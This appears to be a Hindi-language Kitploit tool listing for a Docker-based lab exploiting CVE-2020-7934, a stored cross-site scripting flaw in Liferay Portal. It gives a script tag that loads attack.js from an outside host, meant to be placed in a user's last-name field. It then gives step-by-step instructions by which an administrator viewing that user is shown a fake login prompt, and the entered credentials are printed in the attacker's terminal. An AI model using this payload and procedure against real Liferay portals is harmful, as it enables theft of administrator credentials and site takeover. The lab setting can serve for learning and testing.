हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!
audit-xss-cve-2020-7934 — CVE-2020-7934 को लक्ष्य करने वाले Liferay पोर्टल के लिए Docker-आधारित XSS शोषण। उपयोगकर्ता प्रोफ़ाइल फ़ील्ड के माध्यम से stored cross-site scripting का प्रदर्शन करके व्यवस्थापक क्रेडेंशियल चुराना। | Kitploit
CVE-2020-7934 को लक्ष्य करने वाले Liferay पोर्टल के लिए Docker-आधारित XSS शोषण। उपयोगकर्ता प्रोफ़ाइल फ़ील्ड के माध्यम से stored cross-site scripting का प्रदर्शन करके व्यवस्थापक क्रेडेंशियल चुराना।
हमले की स्क्रिप्ट को ऑनलाइन रखना संभव है (js कोड दिया गया है) http://yourjavascript.com/
हमारी Js स्क्रिप्ट हमले के लिए ऑनलाइन
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>
कॉन्फ़िगरेशन के लिए कमांड
इस प्रोजेक्ट की रूट फ़ोल्डर में जाएं
"sudo docker-compose up --build" चलाएं
नया टर्मिनल: "docker inspect liferay" चलाएं ==> और IPAddress मान कॉपी करें
नया टर्मिनल: "python api_attacker.py" चलाएं
ब्राउज़र खोलें और "http://IPAddress:8080" पर जाएं ==> आपको liferay पोर्टल प्रतिक्रिया के रूप में मिलना चाहिए
कंटेनर रोकने और हटाने के लिए "sudo docker-compose rm" का उपयोग करें
हमले के निर्देश
liferay में एक उपयोगकर्ता के रूप में पंजीकरण करें, लॉग इन करें, और "उपलब्ध साइट्स" अनुभाग में, "liferay" साइट में शामिल हों।
JS स्क्रिप्ट में "अंतिम नाम" बदलें (सीधे () या "src =" http ... "" के माध्यम से)
liferay व्यवस्थापक के रूप में लॉग इन करें (उपयोगकर्ता नाम: [email protected], पासवर्ड: test)
उपलब्ध साइट्स पर जाएं और "liferay" पर क्लिक करें, इस साइट का सार्वजनिक पृष्ठ खुल जाएगा।
नए पृष्ठ पर जाएं, दाईं ओर एक मेनू खुलेगा, सदस्यता पर क्लिक करें।
चरण 1 में पंजीकृत उपयोगकर्ता का चयन करें। उस समय स्क्रिप्ट निष्पादित हो जाएगी।
5.1) स्क्रिप्ट attack.js में पृष्ठ क्रेडेंशियल्स मांगेगा।
चरण 5 (कॉन्फ़िगरेशन के कमांड का) के टर्मिनल में 5.1 में डाले गए उपयोगकर्ता नाम/पासवर्ड मुद्रित होंगे (व्यवस्थापक द्वारा)